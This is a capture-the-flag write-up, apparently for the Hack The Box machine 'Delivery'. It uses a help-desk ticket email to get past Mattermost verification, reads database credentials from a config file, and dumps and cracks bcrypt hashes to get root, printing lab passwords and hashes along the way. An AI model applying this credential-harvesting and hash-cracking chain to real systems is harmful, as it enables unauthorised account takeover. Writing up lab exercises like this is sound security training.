I"y9<h1 id="enumeration">Enumeration</h1>

<h2 id="nmap">Nmap</h2>

<ul>
  <li>port 22</li>
  <li>port 80</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Starting Nmap 7.91 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2021-05-19 20:40 IST
Nmap scan report <span class="k">for </span>10.10.10.222
Host is up <span class="o">(</span>0.20s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 <span class="o">(</span>protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 <span class="o">(</span>RSA<span class="o">)</span>
|   256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome
No exact OS matches <span class="k">for </span>host <span class="o">(</span>If you know what OS is running on it, see https://nmap.org/submit/ <span class="o">)</span><span class="nb">.</span>
TCP/IP fingerprint:
OS:SCAN<span class="o">(</span><span class="nv">V</span><span class="o">=</span>7.91%E<span class="o">=</span>4%D<span class="o">=</span>5/19%OT<span class="o">=</span>22%CT<span class="o">=</span>1%CU<span class="o">=</span>37261%PV<span class="o">=</span>Y%DS<span class="o">=</span>2%DC<span class="o">=</span>T%G<span class="o">=</span>Y%TM<span class="o">=</span>60A52AB
OS:B%P<span class="o">=</span>x86_64-pc-linux-gnu<span class="o">)</span>SEQ<span class="o">(</span><span class="nv">SP</span><span class="o">=</span>104%GCD<span class="o">=</span>1%ISR<span class="o">=</span>106%TI<span class="o">=</span>Z%CI<span class="o">=</span>Z%II<span class="o">=</span>I%TS<span class="o">=</span>A<span class="o">)</span>OPS
OS:<span class="o">(</span><span class="nv">O1</span><span class="o">=</span>M54DST11NW7%O2<span class="o">=</span>M54DST11NW7%O3<span class="o">=</span>M54DNNT11NW7%O4<span class="o">=</span>M54DST11NW7%O5<span class="o">=</span>M54DST1
OS:1NW7%O6<span class="o">=</span>M54DST11<span class="o">)</span>WIN<span class="o">(</span><span class="nv">W1</span><span class="o">=</span>FE88%W2<span class="o">=</span>FE88%W3<span class="o">=</span>FE88%W4<span class="o">=</span>FE88%W5<span class="o">=</span>FE88%W6<span class="o">=</span>FE88<span class="o">)</span>ECN
OS:<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DF<span class="o">=</span>Y%T<span class="o">=</span>40%W<span class="o">=</span>FAF0%O<span class="o">=</span>M54DNNSNW7%CC<span class="o">=</span>Y%Q<span class="o">=)</span>T1<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DF<span class="o">=</span>Y%T<span class="o">=</span>40%S<span class="o">=</span>O%A<span class="o">=</span>S+%F<span class="o">=</span>A
OS:S%RD<span class="o">=</span>0%Q<span class="o">=)</span>T2<span class="o">(</span><span class="nv">R</span><span class="o">=</span>N<span class="o">)</span>T3<span class="o">(</span><span class="nv">R</span><span class="o">=</span>N<span class="o">)</span>T4<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DF<span class="o">=</span>Y%T<span class="o">=</span>40%W<span class="o">=</span>0%S<span class="o">=</span>A%A<span class="o">=</span>Z%F<span class="o">=</span>R%O<span class="o">=</span>%RD<span class="o">=</span>0%Q<span class="o">=)</span>T5<span class="o">(</span>R
OS:<span class="o">=</span>Y%DF<span class="o">=</span>Y%T<span class="o">=</span>40%W<span class="o">=</span>0%S<span class="o">=</span>Z%A<span class="o">=</span>S+%F<span class="o">=</span>AR%O<span class="o">=</span>%RD<span class="o">=</span>0%Q<span class="o">=)</span>T6<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DF<span class="o">=</span>Y%T<span class="o">=</span>40%W<span class="o">=</span>0%S<span class="o">=</span>A%A<span class="o">=</span>Z%F
OS:<span class="o">=</span>R%O<span class="o">=</span>%RD<span class="o">=</span>0%Q<span class="o">=)</span>T7<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DF<span class="o">=</span>Y%T<span class="o">=</span>40%W<span class="o">=</span>0%S<span class="o">=</span>Z%A<span class="o">=</span>S+%F<span class="o">=</span>AR%O<span class="o">=</span>%RD<span class="o">=</span>0%Q<span class="o">=)</span>U1<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DF<span class="o">=</span>N%
OS:T<span class="o">=</span>40%IPL<span class="o">=</span>164%UN<span class="o">=</span>0%RIPL<span class="o">=</span>G%RID<span class="o">=</span>G%RIPCK<span class="o">=</span>G%RUCK<span class="o">=</span>G%RUD<span class="o">=</span>G<span class="o">)</span>IE<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DFI<span class="o">=</span>N%T<span class="o">=</span>40%CD
OS:<span class="o">=</span>S<span class="o">)</span>

Network Distance: 2 hops
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel

TRACEROUTE <span class="o">(</span>using port 80/tcp<span class="o">)</span>
HOP RTT       ADDRESS
1   205.46 ms 10.10.14.1
2   205.55 ms 10.10.10.222

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>70.59 seconds

</code></pre></div></div>

<h2 id="port-80">Port 80</h2>

<p><img src="Pasted image 20210519204541.png" alt="" /></p>

<p>On exploring the source list or Bruteforcing the subdirectories we couldn’t find anything. Therefore looking more towards the <code class="language-plaintext highlighter-rouge">contact</code> section where we can find <code class="language-plaintext highlighter-rouge">help  desk</code>and <code class="language-plaintext highlighter-rouge">mattermost server</code>.</p>

<p>![](Pasted image 20210519204944.png</p>

<p>![[Pasted image 20210519204616.png]]</p>

<p>On visting the help desk we need to add hostname to hostfile.</p>

<p>![[Pasted image 20210519204734.png]]</p>

<h2 id="support-center">Support Center</h2>

<p>![[Pasted image 20210519204821.png]]</p>

<h2 id="mattermost">Mattermost</h2>

<p>![[Pasted image 20210519205100.png]]</p>

<p>Mattermost is an open-source, self-hostable online chat service with file sharing, search, and integrations. It is designed as an internal chat for organisations and companies, and mostly markets itself as an open-source alternative to Slack and Microsoft Teams.</p>

<h1 id="foothold">Foothold</h1>
<ul>
  <li>Sign up for new user</li>
</ul>

<p>![[Pasted image 20210519205229.png]]</p>

<p>![[Pasted image 20210519205553.png]]</p>

<p>Signup almost screwed up Verification required for mail provided for signup. 
Without knowing the code, or a valid email, there’s no way  to bypass the email verification. Machines on HTB won’t send emails out .Looks like we’ve hit a dead-end. Time to moveon and investigate the Help Desk service.</p>

<p>![[Pasted image 20210519205535.png]]</p>

<ul>
  <li>
    <p>In support center there is a way to open a ticket</p>
  </li>
  <li>
    <p>Creating a ticket using username and email</p>
  </li>
</ul>

<p>![[Pasted image 20210519205706.png]]</p>

<p>After submitting ticket we got ticket id and email .</p>

<p>![[Pasted image 20210519205738.png]]
3175892@delivery.htb(my 1st section died)
8757468@delivery.htb(created new one)</p>

<ul>
  <li>With the new email signup for mattermost server.</li>
</ul>

<p>![[Pasted image 20210519210621.png]]</p>

<ul>
  <li>For the verification after signup process , Check the status of the ticket in mattermost sever using the ticket id and email used for creating the new ticket</li>
</ul>

<p>![[Pasted image 20210519210840.png]]</p>

<ul>
  <li>For the verification, use the verification link provided in the status page.</li>
</ul>

<p>http://delivery.htb:8065/do_verify?token=aid6trt41zfhchtoeydz1sww39wyw3gkhcu381g8kkxr7fmi6f8mb9h4cd8mb9h4cd8mdnzrt&amp;email=8757468%40delivery.htb</p>

<h2 id="verification-sucess">Verification Sucess</h2>

<ul>
  <li>Login using our creds</li>
</ul>

<p>![[Pasted image 20210519211912.png]]</p>

<p>message to login the mailserver with password</p>

<table>
  <thead>
    <tr>
      <th>user</th>
      <th>password</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>maildeliverer</td>
      <td>Youve_G0t_Mail!</td>
    </tr>
  </tbody>
</table>

<p>![[Pasted image 20210519212203.png]]</p>

<p>![[Pasted image 20210519212525.png]]</p>

<ul>
  <li>ssh in using creds above</li>
</ul>

<h2 id="user-flag">User flag</h2>

<p>![[Pasted image 20210519212632.png]]</p>

<h1 id="privilege-escalation">Privilege Escalation</h1>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>maildeliverer@Delivery:/opt/mattermost/config<span class="nv">$ </span><span class="nb">ls
</span>README.md  cloud_defaults.json  config.json
</code></pre></div></div>

<ul>
  <li>Reading the config.json in mattermost config we got Username and password to the MariaDB</li>
</ul>

<p>![[Pasted image 20210519212851.png]]</p>

<table>
  <thead>
    <tr>
      <th>user</th>
      <th>password</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>mmuser</td>
      <td>Crack_The_MM_Admin_PW</td>
    </tr>
  </tbody>
</table>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>maildeliverer@Delivery:/opt/mattermost/config<span class="nv">$ </span>mysql <span class="nt">-u</span> mmuser <span class="nt">-D</span> mattermost <span class="nt">-p</span>
Enter password: 
Reading table information <span class="k">for </span>completion of table and column names
You can turn off this feature to get a quicker startup with <span class="nt">-A</span>

Welcome to the MariaDB monitor.  Commands end with <span class="p">;</span> or <span class="se">\g</span><span class="nb">.</span>
Your MariaDB connection <span class="nb">id </span>is 93
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright <span class="o">(</span>c<span class="o">)</span> 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type <span class="s1">'help;'</span> or <span class="s1">'\h'</span> <span class="k">for </span>help. Type <span class="s1">'\c'</span> to clear the current input statement.

MariaDB <span class="o">[</span>mattermost]&gt; 

</code></pre></div></div>

<ul>
  <li>Use Mattermost database</li>
  <li>select username and password and email from users table</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>MariaDB <span class="o">[</span>mattermost]&gt; SELECT Username,Password,Email FROM Users<span class="p">;</span>
+----------------------------------+--------------------------------------------------------------+-------------------------+
| Username                         | Password                                                     | Email                   |
+----------------------------------+--------------------------------------------------------------+-------------------------+
| surveybot                        |                                                              | surveybot@localhost     |
| c3ecacacc7b94f909d04dbfd308a9b93 | <span class="nv">$2a$10$u5815SIBe2Fq1FZlv9S8I</span>.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK | 4120849@delivery.htb    |
| 5b785171bfb34762a933e127630c4860 | <span class="nv">$2a$10$3m0quqyvCE8Z</span>/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G | 7466068@delivery.htb    |
| root                             | <span class="nv">$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O</span>.1STWb4.4ScG.anuu7v0EFJwgjjO | root@delivery.htb       |
| ff0a21fc6fc2488195e16ea854c963ee | <span class="nv">$2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS</span>.Pduq | 9122359@delivery.htb    |
| channelexport                    |                                                              | channelexport@localhost |
| 9ecfb4be145d47fda0724f697f35ffaf | <span class="nv">$2a$10$s</span>.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm | 5056505@delivery.htb    |
+----------------------------------+--------------------------------------------------------------+-------------------------+

</code></pre></div></div>

<p>we found hash for the root user</p>

<table>
  <thead>
    <tr>
      <th>user</th>
      <th>hash</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>root</td>
      <td>$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO</td>
    </tr>
  </tbody>
</table>

<p>Cracking the hash of the root user</p>

<p><em>Also please create a program to help us stop re-using the same passwords everywhere…. Especially those that are a variant of “PleaseSubscribe!”</em> comment that was made on the MatterMost server.</p>

<ul>
  <li>In order to crack the hash we need to create a wordlist using <a href="https://github.com/praetorian-inc/Hob0Rules.git">hashcat rules</a></li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Using default input encoding: UTF-8
Loaded 1 password <span class="nb">hash</span> <span class="o">(</span>bcrypt <span class="o">[</span>Blowfish 32/64 X3]<span class="o">)</span>
Cost 1 <span class="o">(</span>iteration count<span class="o">)</span> is 1024 <span class="k">for </span>all loaded hashes
Will run 2 OpenMP threads
Press <span class="s1">'q'</span> or Ctrl-C to abort, almost any other key <span class="k">for </span>status
Warning: Only 2 candidates left, minimum 6 needed <span class="k">for </span>performance.
PleaseSubscribe!21 <span class="o">(</span>root<span class="o">)</span>
Use the <span class="s2">"--show"</span> option to display all of the cracked passwords reliably
Session completed

</code></pre></div></div>

<table>
  <thead>
    <tr>
      <th>user</th>
      <th>password</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>root</td>
      <td>PleaseSubscribe!21</td>
    </tr>
  </tbody>
</table>

<h2 id="root">Root</h2>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>maildeliverer@Delivery:/opt/mattermost/config<span class="nv">$ </span>su
Password: 
root@Delivery:/opt/mattermost/config# <span class="nb">cd
</span>root@Delivery:~# <span class="nb">ls
</span>mail.sh  note.txt  py-smtp.py  root.txt
root@Delivery:~# 

</code></pre></div></div>

:ET